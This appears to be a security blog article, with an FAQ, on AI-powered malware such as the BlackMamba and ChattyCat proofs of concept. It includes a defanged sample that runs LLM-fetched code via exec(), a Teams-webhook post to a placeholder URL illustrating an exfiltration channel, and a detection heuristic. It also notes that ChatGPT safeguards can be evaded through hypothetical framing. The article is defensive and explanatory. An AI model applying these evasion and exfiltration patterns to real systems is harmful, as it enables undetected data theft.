
    The Growing Menace of AI-Powered Malware


Malware has been a thorn in the side of cybersecurity professionals since the early days of the Internet. Security teams are locked in a seemingly never-ending cat-and-mouse game with cybercriminals as newer and more sophisticated attacks emerge every year. While cybersecurity controls have matured considerably against malware, one development threatens to tip the scales in favor of cybercriminals: AI-driven malware. In this article, we discuss this sophisticated new breed of malware that leverages the power of AI to evade even the most cutting-edge cybersecurity products.

How cybercriminals have leveraged AI for malware

The rise of ChatGPT has been a game-changer across industries, and cybercrime is no exception. With its ability to automate and streamline a wide range of tasks, the AI-powered tool has reshaped perceptions of what AI can achieve and made it a topic of mainstream discussion. Unfortunately, that same power has been harnessed by cybercriminals for writing more convincing phishing emails, researching exploits, and automating attacks, and now we can add malware to the list.

Researchers have demonstrated that the power of Large Language Models (LLMs) like ChatGPT can be used to create sophisticated malware that dynamically alters its behavior at runtime, effectively making it invisible to the latest cybersecurity tools. One such proof of concept, an AI-powered malware called BlackMamba developed by researchers at HYAS, implements polymorphic keylogging without relying on Command and Control (C2) infrastructure. This lets it fly under the radar of current market-leading security tools, which rely on those indicators to detect malicious activity.

The malware is quite ingenious in how it evades detection. A simple, benign-looking executable interacts with OpenAI's API at runtime to obtain the code for its keylogging functionality. Because this code is generated dynamically and constantly regenerated, it is effectively invisible to even the market-leading endpoint detection and response (EDR) systems.
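To make the pattern concrete, here is a minimal, deliberately defanged sketch of dynamic code generation via an LLM API. Everything in it is an assumption for illustration: the model name, the prompt, and the generated payload (a harmless string reverser rather than a keylogger). It sketches the shape of the technique, not a reproduction of BlackMamba.

```python
# Defanged illustration of the dynamic code-generation pattern.
# Assumptions: the openai Python package (v1.x) is installed, OPENAI_API_KEY
# is set, and the model returns a bare Python function named transform().
# The payload requested here is a harmless string reverser, NOT a keylogger.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

def fetch_generated_code() -> str:
    """Ask the model for a small Python snippet and return its source text."""
    response = client.chat.completions.create(
        model="gpt-4o-mini",  # assumed model name, for illustration only
        messages=[{
            "role": "user",
            "content": "Write only a Python function transform(s) that "
                       "returns the input string reversed. No explanation.",
        }],
    )
    return response.choices[0].message.content

def run_dynamic() -> None:
    source = fetch_generated_code()
    namespace: dict = {}
    # exec() compiles and runs freshly generated source in memory, so no
    # static payload ever touches disk -- this is what defeats
    # signature-based scanning.
    exec(source, namespace)
    print(namespace["transform"]("hello"))  # -> "olleh" (if the model obliged)
```

The point is the delivery, not the payload: each run can receive syntactically different code for the same behavior, so a file hash or static signature never sees the same artifact twice.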

Along with dynamically altering its code, BlackMamba does not use the Command and Control infrastructure usually detectable by EDR solutions; instead, it leverages Microsoft Teams to exfiltrate its data. To demonstrate the severity of the attack, BlackMamba was tested against a leading industry-grade EDR solution, which failed to detect it. Such malware could theoretically steal credentials, cardholder data, and other personal information and send it out via Microsoft Teams without any security product noticing.
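Part of what makes this channel so hard to police is that, on the wire, the traffic looks exactly like a routine notification integration. The sketch below shows a standard Teams incoming-webhook post (the webhook URL is a placeholder); a defender inspecting network metadata alone sees only an HTTPS POST to a Microsoft-owned domain.

```python
# Why Teams-based exfiltration blends in: this is the same minimal payload a
# legitimate notification bot sends to a Teams incoming webhook.
# The URL below is a placeholder, not a real webhook.
import requests

WEBHOOK_URL = "https://example.webhook.office.com/webhookb2/placeholder"

def post_to_teams(text: str) -> None:
    # A minimal incoming-webhook message: a single JSON "text" field.
    # At the network layer this is indistinguishable from ordinary
    # collaboration traffic, so destination-based controls never fire.
    requests.post(WEBHOOK_URL, json={"text": text}, timeout=10)

post_to_teams("hello from a routine integration")
```

This is why defenders have to inspect the content and context of collaboration-platform traffic rather than relying on destination reputation alone.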

Along with BlackMamba, CyberArk developed another proof of concept, called ChattyCat, that utilizes ChatGPT. The ChattyCat malware contacts ChatGPT to update and modify its code in a similar fashion to BlackMamba. Together they provide a template for building new types of ransomware and data-exfiltration malware with the same capabilities, and they serve as a wake-up call to the cybersecurity community about this new threat.

    Risks of AI-driven malware

Despite the best efforts of the OpenAI team to build content filters and guardrails that prevent ChatGPT from generating malicious code, cybercriminals can evade these checks and misuse the model for their own purposes. Prompts that would otherwise be refused can slip past the filters when framed as hypothetical scenarios rather than actual ones. This also significantly flattens the learning curve for cybercriminals, as ChatGPT dramatically lowers the technical bar for creating and launching such attacks.

BlackMamba and ChattyCat are merely proofs of concept; however, the rise of AI-generated malware is very much real, and it is only a matter of time before real-world counterparts appear. Malware that continually changes its behavior and operates without Command and Control infrastructure poses a genuine threat to modern security solutions.


    The way forward

ChatGPT has opened a Pandora's box of security challenges and opportunities at the same time. AI regulations intended to bring this technology under some control are still in development; however, cybersecurity professionals cannot afford to wait until those regulations are enacted. The risk posed by AI-powered technology is real, and we are only in the early stages of seeing how it can be misused.

It is essential to put controls in place that enable Large Language Models (LLMs) to track the context of requests so that malicious inputs and responses can be detected, deterring the use of generative AI to create malicious code and malware. Cybersecurity professionals also need to study how this malware operates and deploy controls that can detect polymorphic code and suspicious activity on Microsoft Teams, as sketched below.
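As one concrete (and deliberately simplified) starting point, the sketch below flags Python source that pairs dynamic code execution with network access, the telltale combination in the proofs of concept above. This is a hypothetical illustration, not a production detector; real coverage requires behavioral telemetry rather than static source scanning.

```python
# Hypothetical static heuristic, for illustration only: flag Python source
# that combines dynamic code execution (exec/eval/compile) with imports of
# network-capable modules -- the pairing used by BlackMamba-style PoCs.
import ast

DYNAMIC_EXEC = {"exec", "eval", "compile"}
NETWORK_MODULES = {"requests", "urllib", "http", "socket", "openai"}

def _imported_roots(tree: ast.AST) -> set[str]:
    """Collect the top-level name of every module the source imports."""
    roots: set[str] = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            roots.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            roots.add(node.module.split(".")[0])
    return roots

def looks_suspicious(source: str) -> bool:
    tree = ast.parse(source)
    uses_dynamic_exec = any(
        isinstance(node, ast.Call)
        and isinstance(node.func, ast.Name)
        and node.func.id in DYNAMIC_EXEC
        for node in ast.walk(tree)
    )
    return uses_dynamic_exec and bool(_imported_roots(tree) & NETWORK_MODULES)

# A script that imports requests and exec()s fetched code is flagged;
# ordinary code is not.
print(looks_suspicious("import requests\nexec(requests.get('x').text)"))  # True
print(looks_suspicious("print('hello world')"))                           # False
```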

We are entering a new age in which simple prompts are enough to generate sophisticated malware capable of evading the most cutting-edge security tools. Cybersecurity teams need to upskill and risk-assess their environments against these threats to see where they stand and what measures to implement.

    Frequently Asked Questions

    How do cybercriminals leverage AI for malware?

    Cybercriminals harness the power of AI, specifically Large Language Models like ChatGPT, to automate and streamline various malicious activities. They utilize AI to write better phishing emails, research exploits, automate attacks, and even create sophisticated types of malware.

    What is AI-driven malware, and how does it evade detection?

    AI-driven malware, such as BlackMamba and ChattyCat, dynamically alters its behavior at runtime, making it invisible to the latest cybersecurity tools. By using executable code that interacts with OpenAI’s API, the malware can obtain keylogging functionality that is constantly updated, effectively evading endpoint detection and response (EDR) systems.

What are the risks associated with AI-driven malware?

    Despite content filters and guardrails implemented by OpenAI, cybercriminals can trick ChatGPT into generating malicious code by presenting hypothetical scenarios. This lowers the technical barrier for launching attacks and allows the malware to continually adapt its behavior, operating without a command and control infrastructure.

    How can cybersecurity teams address the threat of AI-driven malware?

    To combat AI-driven malware, cybersecurity teams need to update their controls and invest in tools that detect these evolving threats, such as AI-powered EDR. Implementing measures that enable Large Language Models to track the context of requests is crucial, making it possible to identify and prevent malicious inputs and responses. Upskilling and conducting risk assessments are essential for organizations to protect against these emerging security challenges.
